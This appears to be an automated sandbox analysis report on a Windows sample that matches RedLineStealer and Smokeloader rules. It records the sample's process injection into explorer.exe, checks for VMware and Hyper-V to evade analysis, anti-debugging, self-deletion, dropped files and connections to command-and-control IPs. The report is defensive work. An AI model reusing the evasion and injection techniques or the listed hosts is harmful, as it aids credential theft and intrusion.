      Source: 00000000.00000002.2147151739.0000000002C47000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: 00000004.00000002.2420034001.0000000002D07000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: 00000000.00000002.2148008408.0000000002FF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000000.00000002.2147911658.0000000002FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000000.00000002.2147438487.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: mGFoU1INUk.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: B995.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: ibjgueh.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: classification engineClassification label: mal100.troj.evad.winEXE@4/3@6/3
      Source: C:\Users\user\Desktop\mGFoU1INUk.exeCode function: 0_2_02C4A58F CreateToolhelp32Snapshot,Module32First,0_2_02C4A58F
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\ibjguehJump to behavior
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\B995.tmpJump to behavior
      Source: mGFoU1INUk.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\mGFoU1INUk.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: mGFoU1INUk.exeReversingLabs: Detection: 36%
      Source: mGFoU1INUk.exeVirustotal: Detection: 36%
      Source: unknownProcess created: C:\Users\user\Desktop\mGFoU1INUk.exe "C:\Users\user\Desktop\mGFoU1INUk.exe"
      Source: unknownProcess created: C:\Users\user\AppData\Roaming\ibjgueh C:\Users\user\AppData\Roaming\ibjgueh
      Source: unknownProcess created: C:\Users\user\AppData\Roaming\ibjgueh C:\Users\user\AppData\Roaming\ibjgueh
      Source: C:\Users\user\Desktop\mGFoU1INUk.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\mGFoU1INUk.exeSection loaded: msimg32.dllJump to behavior
      Source: C:\Users\user\Desktop\mGFoU1INUk.exeSection loaded: msvcr100.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: msvcp140.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\ibjguehSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\ibjguehSection loaded: msimg32.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\ibjguehSection loaded: msvcr100.dllJump to behavior
      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32Jump to behavior
      Source: C:\Users\user\Desktop\mGFoU1INUk.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

      Data Obfuscation

      barindex
      Source: C:\Users\user\Desktop\mGFoU1INUk.exeUnpacked PE file: 0.2.mGFoU1INUk.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.suhak:W;.fofifuf:W;.rsrc:R; vs .text:EW;
      Source: C:\Users\user\AppData\Roaming\ibjguehUnpacked PE file: 4.2.ibjgueh.400000.0.unpack .text:ER;.rdata:R;.data:W;.suhak:W;.fofifuf:W;.rsrc:R; vs .text:EW;
      Source: B995.exe.2.drStatic PE information: real checksum: 0x4843e should be: 0x34aa9
      Source: mGFoU1INUk.exeStatic PE information: section name: .suhak
      Source: mGFoU1INUk.exeStatic PE information: section name: .fofifuf
      Source: B995.exe.2.drStatic PE information: section name: .kepojon
      Source: B995.exe.2.drStatic PE information: section name: .mizur
      Source: ibjgueh.2.drStatic PE information: section name: .suhak
      Source: ibjgueh.2.drStatic PE information: section name: .fofifuf
      Source: C:\Users\user\Desktop\mGFoU1INUk.exeCode function: 0_2_004014D9 pushad ; ret 0_2_004014E9
      Source: C:\Users\user\Desktop\mGFoU1INUk.exeCode function: 0_2_004031DB push eax; ret 0_2_004032AB
      Source: C:\Users\user\Desktop\mGFoU1INUk.exeCode function: 0_2_02C4DFE8 push esp; ret 0_2_02C4DFEA
      Source: C:\Users\user\Desktop\mGFoU1INUk.exeCode function: 0_2_02C4CE88 pushfd ; iretd 0_2_02C4CE89
      Source: C:\Users\user\Desktop\mGFoU1INUk.exeCode function: 0_2_02C4C38B push B63524ADh; retn 001Fh0_2_02C4C3C2
      Source: C:\Users\user\Desktop\mGFoU1INUk.exeCode function: 0_2_02C54992 push ds; iretd 0_2_02C54A41
      Source: C:\Users\user\Desktop\mGFoU1INUk.exeCode function: 0_2_02C54570 push eax; iretd 0_2_02C54831
      Source: C:\Users\user\Desktop\mGFoU1INUk.exeCode function: 0_2_02FC1540 pushad ; ret 0_2_02FC1550
      Source: C:\Users\user\AppData\Roaming\ibjguehCode function: 4_2_004014D9 pushad ; ret 4_2_004014E9
      Source: C:\Users\user\AppData\Roaming\ibjguehCode function: 4_2_004031DB push eax; ret 4_2_004032AB
      Source: C:\Users\user\AppData\Roaming\ibjguehCode function: 4_2_02CC1540 pushad ; ret 4_2_02CC1550
      Source: C:\Users\user\AppData\Roaming\ibjguehCode function: 4_2_02D0E468 push esp; ret 4_2_02D0E46A
      Source: C:\Users\user\AppData\Roaming\ibjguehCode function: 4_2_02D0C80B push B63524ADh; retn 001Fh4_2_02D0C842
      Source: C:\Users\user\AppData\Roaming\ibjguehCode function: 4_2_02D0D308 pushfd ; iretd 4_2_02D0D309
      Source: mGFoU1INUk.exeStatic PE information: section name: .text entropy: 7.549565623085082
      Source: B995.exe.2.drStatic PE information: section name: .text entropy: 7.52387746249475
      Source: ibjgueh.2.drStatic PE information: section name: .text entropy: 7.549565623085082
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\B995.exeJump to dropped file
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\ibjguehJump to dropped file
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\ibjguehJump to dropped file

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\mgfou1inuk.exeJump to behavior
      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\ibjgueh:Zone.Identifier read attributes | deleteJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Source: C:\Users\user\Desktop\mGFoU1INUk.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\mGFoU1INUk.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\mGFoU1INUk.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\mGFoU1INUk.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\mGFoU1INUk.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\mGFoU1INUk.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\ibjguehKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\ibjguehKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\ibjguehKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\ibjguehKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\ibjguehKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\ibjguehKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\mGFoU1INUk.exeAPI/Special instruction interceptor: Address: 7FF8C88EE814
      Source: C:\Users\user\Desktop\mGFoU1INUk.exeAPI/Special instruction interceptor: Address: 7FF8C88ED584
      Source: C:\Users\user\AppData\Roaming\ibjguehAPI/Special instruction interceptor: Address: 7FF8C88EE814
      Source: C:\Users\user\AppData\Roaming\ibjguehAPI/Special instruction interceptor: Address: 7FF8C88ED584
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 422Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 2137Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 822Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 2669Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 889Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 867Jump to behavior
      Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\B995.exeJump to dropped file
      Source: C:\Windows\explorer.exe TID: 2616Thread sleep count: 422 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 6284Thread sleep count: 2137 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 6284Thread sleep time: -213700s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 1972Thread sleep count: 822 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 1972Thread sleep time: -82200s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 6536Thread sleep count: 292 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 4308Thread sleep count: 339 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 4308Thread sleep time: -33900s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 3228Thread sleep count: 297 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 6284Thread sleep count: 2669 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 6284Thread sleep time: -266900s >= -30000sJump to behavior
      Source: explorer.exe, 00000002.00000000.2125963281.0000000009B90000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
      Source: explorer.exe, 00000002.00000000.2123955019.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
      Source: explorer.exe, 00000002.00000000.2125963281.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0r
      Source: explorer.exe, 00000002.00000000.2125963281.0000000009B90000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
      Source: explorer.exe, 00000002.00000000.2125963281.0000000009B90000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTcaVMWare
      Source: explorer.exe, 00000002.00000000.2125963281.0000000009B90000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000002.00000000.2125963281.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
      Source: explorer.exe, 00000002.00000000.2122929961.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
      Source: explorer.exe, 00000002.00000000.2125963281.0000000009B90000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
      Source: explorer.exe, 00000002.00000000.2131329047.000000000C81C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}lfons>
      Source: explorer.exe, 00000002.00000000.2131329047.000000000C81C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Packages
      Source: explorer.exe, 00000002.00000000.2122001915.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
      Source: explorer.exe, 00000002.00000000.2122929961.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware-42 27 d9 2e dc 89 72 dX
      Source: explorer.exe, 00000002.00000000.2123955019.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
      Source: explorer.exe, 00000002.00000000.2125963281.0000000009B2C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: explorer.exe, 00000002.00000000.2122929961.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
      Source: explorer.exe, 00000002.00000000.2122929961.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware,p
      Source: explorer.exe, 00000002.00000000.2125963281.0000000009B90000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
      Source: explorer.exe, 00000002.00000000.2122001915.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
      Source: explorer.exe, 00000002.00000000.2125963281.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000002.00000000.2123955019.000000000769A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: C:\Users\user\Desktop\mGFoU1INUk.exeSystem information queried: ModuleInformationJump to behavior
      Source: C:\Users\user\Desktop\mGFoU1INUk.exeProcess information queried: ProcessInformationJump to behavior

      Anti Debugging

      barindex
      Source: C:\Users\user\Desktop\mGFoU1INUk.exeSystem information queried: CodeIntegrityInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\ibjguehSystem information queried: CodeIntegrityInformationJump to behavior
      Source: C:\Users\user\Desktop\mGFoU1INUk.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\AppData\Roaming\ibjguehProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\mGFoU1INUk.exeCode function: 0_2_02C49E6C push dword ptr fs:[00000030h]0_2_02C49E6C
      Source: C:\Users\user\Desktop\mGFoU1INUk.exeCode function: 0_2_02FC0D90 mov eax, dword ptr fs:[00000030h]0_2_02FC0D90
      Source: C:\Users\user\Desktop\mGFoU1INUk.exeCode function: 0_2_02FC092B mov eax, dword ptr fs:[00000030h]0_2_02FC092B
      Source: C:\Users\user\AppData\Roaming\ibjguehCode function: 4_2_02CC0D90 mov eax, dword ptr fs:[00000030h]4_2_02CC0D90
      Source: C:\Users\user\AppData\Roaming\ibjguehCode function: 4_2_02CC092B mov eax, dword ptr fs:[00000030h]4_2_02CC092B
      Source: C:\Users\user\AppData\Roaming\ibjguehCode function: 4_2_02D0A2EC push dword ptr fs:[00000030h]4_2_02D0A2EC

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\Windows\explorer.exeFile created: B995.exe.2.drJump to dropped file
      Source: C:\Windows\explorer.exeNetwork Connect: 175.119.10.231 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 23.145.40.164 443Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 119.204.11.2 80Jump to behavior
      Source: C:\Users\user\Desktop\mGFoU1INUk.exeThread created: C:\Windows\explorer.exe EIP: 30519A8Jump to behavior
      Source: C:\Users\user\AppData\Roaming\ibjguehThread created: unknown EIP: 88B19A8Jump to behavior
      Source: C:\Users\user\Desktop\mGFoU1INUk.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Users\user\Desktop\mGFoU1INUk.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
      Source: C:\Users\user\AppData\Roaming\ibjguehSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\ibjguehSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
      Source: explorer.exe, 00000002.00000000.2125963281.0000000009B90000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd=
      Source: explorer.exe, 00000002.00000000.2122433987.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
      Source: explorer.exe, 00000002.00000000.2122433987.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2123767253.0000000004B00000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000002.00000000.2122433987.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
      Source: explorer.exe, 00000002.00000000.2122433987.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
      Source: explorer.exe, 00000002.00000000.2122001915.0000000000EF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PProgman
      Source: C:\Users\user\AppData\Roaming\ibjguehCode function: 6_2_00404E64 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,6_2_00404E64
      Source: C:\Users\user\Desktop\mGFoU1INUk.exeCode function: 0_2_00415BA0 InterlockedCompareExchange,ReadConsoleA,FindAtomW,SetConsoleMode,SearchPathW,SetDefaultCommConfigW,MoveFileW,GetVersionExW,DisconnectNamedPipe,ReadConsoleOutputW,GetModuleFileNameA,LCMapStringA,PulseEvent,SetCommState,GetConsoleAliasesLengthA,GetStringTypeExW,BuildCommDCBA,GetTimeFormatW,GetFileAttributesA,GetConsoleAliasExesLengthA,GetBinaryType,LoadLibraryA,InterlockedDecrement,0_2_00415BA0

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: 00000004.00000002.2419910079.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.2420146039.0000000002F01000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.2148008408.0000000002FF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.2147911658.0000000002FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: 00000004.00000002.2419910079.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.2420146039.0000000002F01000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.2148008408.0000000002FF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.2147911658.0000000002FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Exploitation for Client Execution
      1
      DLL Side-Loading
      32
      Process Injection
      11
      Masquerading
      OS Credential Dumping1
      System Time Discovery
      Remote Services1
      Archive Collected Data
      11
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
      DLL Side-Loading
      12
      Virtualization/Sandbox Evasion
      LSASS Memory411
      Security Software Discovery
      Remote Desktop ProtocolData from Removable Media3
      Ingress Tool Transfer
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)32
      Process Injection
      Security Account Manager12
      Virtualization/Sandbox Evasion
      SMB/Windows Admin SharesData from Network Shared Drive4
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Hidden Files and Directories
      NTDS3
      Process Discovery
      Distributed Component Object ModelInput Capture115
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
      Obfuscated Files or Information
      LSA Secrets1
      Application Window Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
      Software Packing
      Cached Domain Credentials1
      File and Directory Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
      DLL Side-Loading
      DCSync14
      System Information Discovery
      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
      File Deletion
      Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
